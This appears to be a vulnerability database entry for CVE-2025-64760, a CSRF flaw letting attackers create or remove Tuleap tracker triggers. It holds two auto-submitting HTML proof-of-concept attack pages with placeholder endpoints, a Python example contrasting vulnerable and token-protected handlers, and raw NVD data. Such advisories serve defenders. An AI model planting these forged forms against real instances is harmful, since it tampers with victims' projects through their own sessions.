Security Vulnerability Report
CVE-2025-64760 CVSS 4.6 MEDIUM

Published: 2025-12-08 23:15:49
Last Modified: 2025-12-10 21:01:57

Description

Tuleap is a free and open source suite for management of software development and collaboration. Versions of Tuleap Community Edition prior to 17.0.99.1763126988 and Tuleap Enterprise Edition prior to 17.0-3 and 16.13-8 have missing CSRF protections which allow attackers to create or remove tracker triggers. This issue is fixed in Tuleap Community Edition version 17.0.99.1763126988 and Tuleap Enterprise Edition versions 17.0-3 and 16.13-8.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector (CNA assessment, listed as Secondary in the NVD record)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L
NVD Primary Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N (base score 4.3, MEDIUM)
Weakness
CWE-352 (Cross-Site Request Forgery)

Both assessments carry UI:R: the attack only works if a logged-in user who is allowed to manage the tracker's triggers opens an attacker-controlled page while their session is valid. They differ on PR (NVD scores the attacker as needing no privileges of their own, since the victim supplies them) and on availability impact.

Configurations (Affected Products)

cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:* - VULNERABLE (versions before 16.13-8)
cpe:2.3:a:enalean:tuleap:*:*:*:*:community:*:*:* - VULNERABLE (versions before 17.0.99.1763126988)
cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:* - VULNERABLE (17.0 up to, but excluding, 17.0-3)
Tuleap Community Edition < 17.0.99.1763126988
Tuleap Enterprise Edition 17.0 <= version < 17.0-3
Tuleap Enterprise Edition < 16.13-8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-64760 - Create Tracker Trigger -->
<!-- Placeholders: the action URL and the form field names below are not
     confirmed by the advisory (the "?aid=45618" query string is the vendor's
     issue-tracker reference URL, not a trigger endpoint). Capture a legitimate
     trigger create/delete request on a test instance and substitute the real
     endpoint and parameters before use. -->
<!DOCTYPE html>
<html>
<head>
  <title>Tracker Trigger Creation</title>
</head>
<body>
  <h1>Loading...</h1>
  <form id="csrfForm" action="https://target-tuleap-instance/plugins/tracker/?aid=45618" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="func" value="admin-formCreateTrigger" />
    <input type="hidden" name="tracker_id" value="123" />
    <input type="hidden" name="trigger_name" value="malicious_trigger" />
    <input type="hidden" name="trigger_condition" value="on_update" />
    <input type="hidden" name="trigger_action" value="send_email" />
  </form>
  <script>
    // Submits as soon as the page loads. The victim (a logged-in user allowed
    // to manage the tracker's triggers) still has to open this page, which is
    // the UI:R in the CVSS vector; the browser attaches the victim's session
    // cookie to the cross-site POST.
    document.getElementById('csrfForm').submit();
  </script>
</body>
</html>

html
<!-- CSRF PoC for CVE-2025-64760 - Delete Tracker Trigger -->
<!-- Same placeholder caveat as above: endpoint and field names are unverified. -->
<!DOCTYPE html>
<html>
<head>
  <title>Tracker Trigger Deletion</title>
</head>
<body>
  <form id="deleteForm" action="https://target-tuleap-instance/plugins/tracker/?aid=45618" method="POST">
    <input type="hidden" name="func" value="admin-deleteTrigger" />
    <input type="hidden" name="tracker_id" value="123" />
    <input type="hidden" name="trigger_id" value="456" />
    <input type="hidden" name="confirm" value="1" />
  </form>
  <script>
    // Same auto-submit: fires when a logged-in victim opens the page.
    document.getElementById('deleteForm').submit();
  </script>
</body>
</html>
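To make the weakness behind the PoC above concrete, the following is an added example, not code from Tuleap or from this advisory: a toy tracker-trigger admin endpoint modelled twice, once in the pre-fix shape (the session cookie alone authenticates the POST, so a form posted from any site succeeds) and once with the standard remedy for CWE-352, a per-session synchronizer token compared in constant time, with Fetch Metadata (Sec-Fetch-Site) as defence in depth. The class, function and form-field names (`TriggerAdmin`, `create_trigger`, `csrf_token`, and so on) and the request model are assumptions for illustration and do not reproduce Tuleap's real controller or parameters.

```python
"""Added illustration for CVE-2025-64760 (not Tuleap's code): a toy
tracker-trigger admin endpoint without and with CSRF protection. All
names and form fields are assumed and do not mirror Tuleap's real ones."""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    user_id: int
    is_tracker_admin: bool
    # Per-session secret; only pages served by this site can embed it in a form.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    form: dict
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


class TriggerAdmin:
    """Stand-in for the controller that creates and removes tracker triggers."""

    def __init__(self, sessions: dict) -> None:
        self.sessions = sessions
        self.triggers: dict = {}
        self._next_id = 1

    def _session(self, req: Request):
        return self.sessions.get(req.cookies.get("session_id", ""))

    def _apply(self, session: Session, form: dict) -> tuple:
        # Authorization exists in both variants: CSRF rides on an authorized victim.
        if not session.is_tracker_admin:
            return 403, "forbidden"
        func = form.get("func")
        if func == "create_trigger":
            trigger_id = self._next_id
            self._next_id += 1
            self.triggers[trigger_id] = {"tracker_id": form["tracker_id"],
                                         "name": form["name"]}
            return 200, f"created {trigger_id}"
        if func == "delete_trigger":
            trigger_id = int(form["trigger_id"])
            if trigger_id not in self.triggers:
                return 404, "no such trigger"
            del self.triggers[trigger_id]
            return 200, f"deleted {trigger_id}"
        return 400, "unknown func"

    def handle_vulnerable(self, req: Request) -> tuple:
        """Pre-fix shape: the cookie alone authenticates, whatever site posted the form."""
        session = self._session(req)
        if req.method != "POST" or session is None:
            return 401, "login required"
        return self._apply(session, req.form)

    def handle_hardened(self, req: Request) -> tuple:
        """Fixed shape: same logic plus a synchronizer token the attacker's
        page cannot read, with Fetch Metadata as defence in depth."""
        session = self._session(req)
        if req.method != "POST" or session is None:
            return 401, "login required"
        # Browsers label cross-site form posts with Sec-Fetch-Site: cross-site.
        # A missing header (non-browser client) falls through to the token check.
        if req.headers.get("Sec-Fetch-Site") == "cross-site":
            return 403, "cross-site request rejected"
        submitted = req.form.get("csrf_token", "")
        # Constant-time comparison against the token bound to this session.
        if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
            return 403, "csrf token missing or invalid"
        return self._apply(session, req.form)


def demo() -> dict:
    """Constructed scenario: a logged-in tracker admin, a legitimate create
    from the site's own form, then a forged delete from attacker.example."""
    admin = Session(user_id=42, is_tracker_admin=True)
    sessions = {"s3ss10n": admin}
    cookie = {"session_id": "s3ss10n"}  # the browser sends it either way
    legit = Request("POST", {"func": "create_trigger", "tracker_id": "123",
                             "name": "notify-on-close",
                             "csrf_token": admin.csrf_token},
                    cookie, {"Sec-Fetch-Site": "same-origin"})
    forged = Request("POST", {"func": "delete_trigger", "trigger_id": "1"},
                     cookie, {"Sec-Fetch-Site": "cross-site"})
    results = {}
    for label, handler in (("vulnerable", TriggerAdmin.handle_vulnerable),
                           ("hardened", TriggerAdmin.handle_hardened)):
        app = TriggerAdmin(sessions)
        created, forged_delete = handler(app, legit), handler(app, forged)
        results[label] = (created[0], forged_delete[0], len(app.triggers))
    return results
```

`demo()` returns `{'vulnerable': (200, 200, 0), 'hardened': (200, 403, 1)}`: against the unprotected handler the forged delete succeeds and the admin's trigger is gone; against the hardened handler the legitimate create still works and the forgery is rejected. Two caveats worth keeping in mind when assessing exposure: the attack depends on the browser attaching the victim's session cookie to a cross-site POST, so cookies marked SameSite=Lax or Strict (Lax is the default in current Chromium-based browsers) blunt it, and the Sec-Fetch-Site check alone is not sufficient because clients that omit the header must still be stopped by the token. The actual fix shipped in the commit listed under References.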

References

https://github.com/Enalean/tuleap/security/advisories/GHSA-f2xv-x3g6-4j9p (Vendor Advisory)
https://github.com/Enalean/tuleap/commit/71d427b0f7ed8fa269a5ee6f7a557cf3dfc99cd4 (Patch)
https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=71d427b0f7ed8fa269a5ee6f7a557cf3dfc99cd4 (Patch; tagged Broken Link by NVD)
https://tuleap.net/plugins/tracker/?aid=45618 (Issue Tracking, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64760", "sourceIdentifier": "[email protected]", "published": "2025-12-08T23:15:48.510", "lastModified": "2025-12-10T21:01:57.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tuleap is a free and open source suite for management of software development and collaboration. Versions of Tuleap Community Edition prior to 17.0.99.1763126988 and Tuleap Enterprise Edition prior to 17.0-3 and 16.13-8 have missing CSRF protections which allow attackers to create or remove tracker triggers. This issue is fixed in Tuleap Community Edition version 17.0.99.1763126988 and Tuleap Enterprise Edition versions 17.0-3 and 16.13-8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionEndExcluding": "16.13-8", "matchCriteriaId": 
"07CF66A2-4F1D-40FC-A697-A2435DA23B49"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:community:*:*:*", "versionEndExcluding": "17.0.99.1763126988", "matchCriteriaId": "1EFA1067-6717-4904-9DCB-FD8FE056BE2D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.0", "versionEndExcluding": "17.0-3", "matchCriteriaId": "08BC8EA2-3661-4BD1-AA60-5956C396ACC9"}]}]}], "references": [{"url": "https://github.com/Enalean/tuleap/commit/71d427b0f7ed8fa269a5ee6f7a557cf3dfc99cd4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Enalean/tuleap/security/advisories/GHSA-f2xv-x3g6-4j9p", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=71d427b0f7ed8fa269a5ee6f7a557cf3dfc99cd4", "source": "[email protected]", "tags": ["Patch", "Broken Link"]}, {"url": "https://tuleap.net/plugins/tracker/?aid=45618", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}